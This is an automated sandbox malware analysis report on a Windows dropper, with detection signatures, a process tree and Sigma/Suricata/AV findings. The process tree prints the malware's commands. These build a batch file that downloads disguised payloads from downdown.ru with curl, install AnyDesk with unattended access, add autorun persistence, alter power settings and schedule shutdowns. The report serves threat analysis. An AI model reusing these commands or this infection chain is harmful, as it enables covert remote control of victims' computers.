Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Yv24LkKBY6.exe

Overview

General Information

Sample name:Yv24LkKBY6.exe
Analysis ID:1588958
MD5:f0aba799546b1ce04037793579de3c94
SHA1:3477b56ece979666e4b094534e074f39d52545fe
SHA256:de998bd26ea326e610cc70654499cebfd594cc973438ac421e4c7e1f3b887617
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Allocates memory in foreign processes
Creates files in the system32 config directory
Disables DEP (Data Execution Prevention) for certain images
Downloads files with wrong headers with respect to MIME Content-Type
Drops PE files with benign system names
Found stalling execution ending in API Sleep call
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global get message hook
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Group Policy settings
Modifies power options to not sleep / hibernate
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses shutdown.exe to shutdown or reboot the system
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a global mouse hook
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Execution of Shutdown
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • Yv24LkKBY6.exe (PID: 5908 cmdline: "C:\Users\user\Desktop\Yv24LkKBY6.exe" MD5: F0ABA799546B1CE04037793579DE3C94)
    • AcroRd32.exe (PID: 2296 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Intel\ 131.pdf" MD5: 6791EAE6124B58F201B32F1F6C3EC1B0)
    • cmd.exe (PID: 4152 cmdline: "C:\Windows\System32\cmd.exe" /c echo>C:\Intel\rezet.cmd cd C:\Intel\ MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • attrib.exe (PID: 2508 cmdline: "C:\Windows\System32\attrib.exe" +s +h C:\Intel MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 2120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6888 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd ping -n 6 127.0.0.1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7392 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\driver.exe http://downdown.ru/driver.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1268 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\blat.exe http://downdown.ru/blat.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6432 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\svchost.exe http://downdown.ru/svchost.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5796 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\Trays.rar http://downdown.ru/Trays.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8036 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\AnyDesk\wol.ps1 http://downdown.ru/wol.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6320 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\dc.exe http://downdown.ru/dc.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2816 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\Trays.rar C:\Intel\ /y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4152 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd start C:\Intel\Trays\Trays.lnk MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2508 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd svchost.exe --install C:\Intel\AnyDesk MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6888 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\AnyDesk\bat.bat http://downdown.ru/bat.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2244 cmdline: "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\AnyDesk\bat.lnk MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6028 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Intel\rezet.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • PING.EXE (PID: 8052 cmdline: ping -n 6 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • curl.exe (PID: 4108 cmdline: C:\Intel\curl.exe -o C:\Intel\driver.exe http://downdown.ru/driver.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4)
      • curl.exe (PID: 6188 cmdline: C:\Intel\curl.exe -o C:\Intel\blat.exe http://downdown.ru/blat.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4)
      • curl.exe (PID: 6632 cmdline: C:\Intel\curl.exe -o C:\Intel\svchost.exe http://downdown.ru/svchost.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4)
      • curl.exe (PID: 3588 cmdline: C:\Intel\curl.exe -o C:\Intel\Trays.rar http://downdown.ru/Trays.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4)
      • curl.exe (PID: 1956 cmdline: C:\Intel\curl.exe -o C:\Intel\AnyDesk\wol.ps1 http://downdown.ru/wol.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4)
      • curl.exe (PID: 7956 cmdline: C:\Intel\curl.exe -o C:\Intel\dc.exe http://downdown.ru/dc.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4)
      • driver.exe (PID: 1904 cmdline: C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\Trays.rar C:\Intel\ /y MD5: 29086D9247FDF40452563C11B3DCA394)
      • Trays.exe (PID: 2476 cmdline: "C:\Intel\Trays\Trays.exe" -tray MD5: 90D208B856DEA18596D57FFB1DD3A867)
        • 4t-min64.exe (PID: 2020 cmdline: "C:\Intel\Trays\4t-min64.exe" "C:\Intel\Trays\ShellEh6055x64.dll" MD5: 7BC3AEEDC18717D796F1C7FF8DBF0C17)
      • svchost.exe (PID: 7000 cmdline: svchost.exe --install C:\Intel\AnyDesk MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
        • svchost.exe (PID: 3588 cmdline: "C:\Intel\svchost.exe" --local-service MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
        • svchost.exe (PID: 3440 cmdline: "C:\Intel\svchost.exe" --local-control MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
      • curl.exe (PID: 6064 cmdline: C:\Intel\curl.exe -o C:\Intel\AnyDesk\bat.bat http://downdown.ru/bat.jpg MD5: 9542F4AC0CAEFA766BD67BA879ED2DD4)
      • cmd.exe (PID: 7916 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Intel\AnyDesk\bat.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 948 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo QWERTY1234566 " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • AnyDesk.exe (PID: 808 cmdline: AnyDesk.exe --set-password _unattended_access MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
        • dc.exe (PID: 7224 cmdline: C:\Intel\dc.exe /D MD5: 139464919440E93E49C80CC890B90585)
          • dc.exe (PID: 2444 cmdline: "C:\Intel\dc.exe" /SYS 1 MD5: 139464919440E93E49C80CC890B90585)
        • powercfg.exe (PID: 7488 cmdline: powercfg -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
        • powercfg.exe (PID: 4628 cmdline: powercfg -change -standby-timeout-ac 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
        • powercfg.exe (PID: 480 cmdline: powercfg -change -hibernate-timeout-ac 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
        • powercfg.exe (PID: 7956 cmdline: powercfg -h off MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
        • powercfg.exe (PID: 2380 cmdline: powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
        • powercfg.exe (PID: 6592 cmdline: powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
        • schtasks.exe (PID: 7720 cmdline: schtasks /create /tn "ShutdownAt5AM" /tr "shutdown /s /f /t 0" /sc daily /st 05:00 MD5: 478BEAEC1C3A9417272BC8964ADD1CEE)
        • powershell.exe (PID: 7464 cmdline: Powershell.exe -executionpolicy remotesigned -File C:\Intel\AnyDesk\wol.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • AnyDesk.exe (PID: 2596 cmdline: "C:\Intel\AnyDesk\AnyDesk.exe" --service MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
  • AnyDesk.exe (PID: 2728 cmdline: "C:\Intel\AnyDesk\AnyDesk.exe" --control MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
  • AnyDesk.exe (PID: 7952 cmdline: "C:\Intel\AnyDesk\AnyDesk.exe" --new-install MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
    • AnyDesk.exe (PID: 7876 cmdline: "C:\Intel\AnyDesk\AnyDesk.exe" --crash-handler MD5: 39F35F94DB3D8CD6B2811D1A5C4E5BDA)
  • svchost.exe (PID: 6400 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc MD5: F586835082F632DC8D9404D83BC16316)
  • svchost.exe (PID: 4584 cmdline: C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc MD5: F586835082F632DC8D9404D83BC16316)
  • svchost.exe (PID: 3380 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum MD5: F586835082F632DC8D9404D83BC16316)
  • svchost.exe (PID: 4112 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon MD5: F586835082F632DC8D9404D83BC16316)
  • svchost.exe (PID: 8 cmdline: C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc MD5: F586835082F632DC8D9404D83BC16316)
  • shutdown.exe (PID: 3396 cmdline: C:\Windows\system32\shutdown.EXE /s /f /t 0 MD5: F2A4E18DA72BB2C5B21076A5DE382A20)
    • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • msedge.exe (PID: 7532 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Intel\AnyDesk\bat.batJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Files With System Process Name In Unsuspected Locations
    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Intel\curl.exe, ProcessId: 6632, TargetFilename: C:\Intel\svchost.exe
    Sigma detected: System File Execution Location Anomaly
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: svchost.exe --install C:\Intel\AnyDesk, CommandLine: svchost.exe --install C:\Intel\AnyDesk, CommandLine|base64offset|contains: , Image: C:\Intel\svchost.exe, NewProcessName: C:\Intel\svchost.exe, OriginalFileName: C:\Intel\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Intel\rezet.cmd" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6028, ParentProcessName: cmd.exe, ProcessCommandLine: svchost.exe --install C:\Intel\AnyDesk, ProcessId: 7000, ProcessName: svchost.exe
    Sigma detected: CurrentVersion Autorun Keys Modification
    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Intel\Trays\trays.lnk, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Yv24LkKBY6.exe, ProcessId: 5908, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Video Configurations
    Sigma detected: Suspicious Execution of Shutdown
    Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\shutdown.EXE /s /f /t 0, CommandLine: C:\Windows\system32\shutdown.EXE /s /f /t 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\shutdown.exe, NewProcessName: C:\Windows\System32\shutdown.exe, OriginalFileName: C:\Windows\System32\shutdown.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1424, ProcessCommandLine: C:\Windows\system32\shutdown.EXE /s /f /t 0, ProcessId: 3396, ProcessName: shutdown.exe
    Sigma detected: Uncommon Svchost Parent Process
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe --install C:\Intel\AnyDesk, CommandLine: svchost.exe --install C:\Intel\AnyDesk, CommandLine|base64offset|contains: , Image: C:\Intel\svchost.exe, NewProcessName: C:\Intel\svchost.exe, OriginalFileName: C:\Intel\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Intel\rezet.cmd" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6028, ParentProcessName: cmd.exe, ProcessCommandLine: svchost.exe --install C:\Intel\AnyDesk, ProcessId: 7000, ProcessName: svchost.exe
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: Powershell.exe -executionpolicy remotesigned -File C:\Intel\AnyDesk\wol.ps1, CommandLine: Powershell.exe -executionpolicy remotesigned -File C:\Intel\AnyDesk\wol.ps1, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Intel\AnyDesk\bat.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7916, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell.exe -executionpolicy remotesigned -File C:\Intel\AnyDesk\wol.ps1, ProcessId: 7464, ProcessName: powershell.exe
    Sigma detected: Windows Processes Suspicious Parent Directory
    Source: Process startedAuthor: vburov: Data: Command: "C:\Intel\svchost.exe" --local-service, CommandLine: "C:\Intel\svchost.exe" --local-service, CommandLine|base64offset|contains: hq~, Image: C:\Intel\svchost.exe, NewProcessName: C:\Intel\svchost.exe, OriginalFileName: C:\Intel\svchost.exe, ParentCommandLine: svchost.exe --install C:\Intel\AnyDesk, ParentImage: C:\Intel\svchost.exe, ParentProcessId: 7000, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Intel\svchost.exe" --local-service, ProcessId: 3588, ProcessName: svchost.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-11T07:53:56.006785+010020087541A Network Trojan was detected185.125.51.580192.168.11.2049757TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-11T07:53:49.151969+010020251691A Network Trojan was detected185.125.51.580192.168.11.2049754TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-11T07:53:49.151969+010020251611A Network Trojan was detected185.125.51.580192.168.11.2049754TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: Yv24LkKBY6.exeAvira: detected
    Antivirus detection for URL or domain
    Source: http://downdown.ru/driver.jpgAvira URL Cloud: Label: malware
    Source: http://downdown.ru/blat.jpgAvira URL Cloud: Label: malware
    Source: http://downdown.ru/svchost.jpgAvira URL Cloud: Label: malware
    Antivirus detection for dropped file
    Source: C:\Intel\AnyDesk\AnyDesk.exeAvira: detection malicious, Label: TR/Agent.nyvag
    Source: C:\Intel\svchost.exeAvira: detection malicious, Label: TR/Agent.nyvag
    Multi AV Scanner detection for dropped file
    Source: C:\Intel\AnyDesk\AnyDesk.exeReversingLabs: Detection: 50%
    Source: C:\Intel\dc.exeReversingLabs: Detection: 50%
    Source: C:\Intel\svchost.exeReversingLabs: Detection: 50%
    Multi AV Scanner detection for submitted file
    Source: Yv24LkKBY6.exeVirustotal: Detection: 64%Perma Link
    Source: Yv24LkKBY6.exeReversingLabs: Detection: 55%
    Machine Learning detection for sample
    Source: Yv24LkKBY6.exeJoe Sandbox ML: detected
    Source: Yv24LkKBY6.exe, 00000000.00000003.20214750806.0000000002840000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_c3d5e25a-9
    Source: Yv24LkKBY6.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
    Source: C:\Intel\driver.exeFile created: C:\Intel\Trays\license.txt
    Source: C:\Intel\driver.exeFile created: C:\Intel\Trays\readme.txt
    Source: unknownHTTPS traffic detected: 57.129.37.157:443 -> 192.168.11.20:49761 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 57.129.37.157:443 -> 192.168.11.20:49763 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 160.202.165.71:443 -> 192.168.11.20:49766 version: TLS 1.2
    Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dwm_dda-32\privacy_feature\privacy_feature.pdb source: svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.20533988415.000000000145D000.00000004.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000002.20486832706.000000000145D000.00000004.00000001.01000000.00000009.sdmp
    Source: Binary string: C:\Users\peter\Documents\GitHub\curl-for-windows\out\x86\Release\curl.x86.pdb] source: Yv24LkKBY6.exe, 00000000.00000003.20214750806.0000000002840000.00000004.00001000.00020000.00000000.sdmp, curl.exe, 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000022.00000000.20288732251.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000023.00000000.20311294063.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000023.00000002.20326280428.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000024.00000000.20328578801.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000024.00000002.20360446525.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000025.00000000.20362870597.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000025.00000002.20385779265.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000026.00000002.20394155958.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000026.00000000.20388028622.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000027.00000002.20416665272.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000027.00000000.20396813028.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000032.00000002.20546299739.00000000002DD000.00000002.00000001.01000000.00000006.sdmp
    Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_loader\AnyDesk.pdb source: svchost.exe, 0000002A.00000002.20535133705.000000000165A000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000002.20487521906.000000000165A000.00000002.00000001.01000000.00000009.sdmp, AnyDesk.exe, 00000036.00000000.20555806082.000000000165A000.00000002.00000001.01000000.0000000F.sdmp
    Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dwm_dda-64\win_dwm\win_dwm.pdb source: svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.20533988415.000000000145D000.00000004.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000002.20486832706.000000000145D000.00000004.00000001.01000000.00000009.sdmp
    Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dwm_dda-32\win_dwm\win_dwm.pdb source: svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.20533988415.000000000145D000.00000004.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000002.20486832706.000000000145D000.00000004.00000001.01000000.00000009.sdmp
    Source: Binary string: C:\Users\ashakhmut\Projects\anydesk\deps\win_system_id\build\win_system_id_dll.pdb source: svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.20533988415.000000000145D000.00000004.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000002.20486832706.000000000145D000.00000004.00000001.01000000.00000009.sdmp
    Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_app\win_app.pdb source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp
    Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dwm_dda-64\privacy_feature\privacy_feature.pdb source: svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.20533988415.000000000145D000.00000004.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000002.20486832706.000000000145D000.00000004.00000001.01000000.00000009.sdmp
    Source: Binary string: SAS.pdbR source: svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.20533988415.000000000145D000.00000004.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000002.20486832706.000000000145D000.00000004.00000001.01000000.00000009.sdmp
    Source: Binary string: C:\Users\peter\Documents\GitHub\curl-for-windows\out\x86\Release\curl.x86.pdb source: Yv24LkKBY6.exe, 00000000.00000003.20214750806.0000000002840000.00000004.00001000.00020000.00000000.sdmp, curl.exe, 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000022.00000000.20288732251.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000023.00000000.20311294063.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000023.00000002.20326280428.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000024.00000000.20328578801.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000024.00000002.20360446525.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 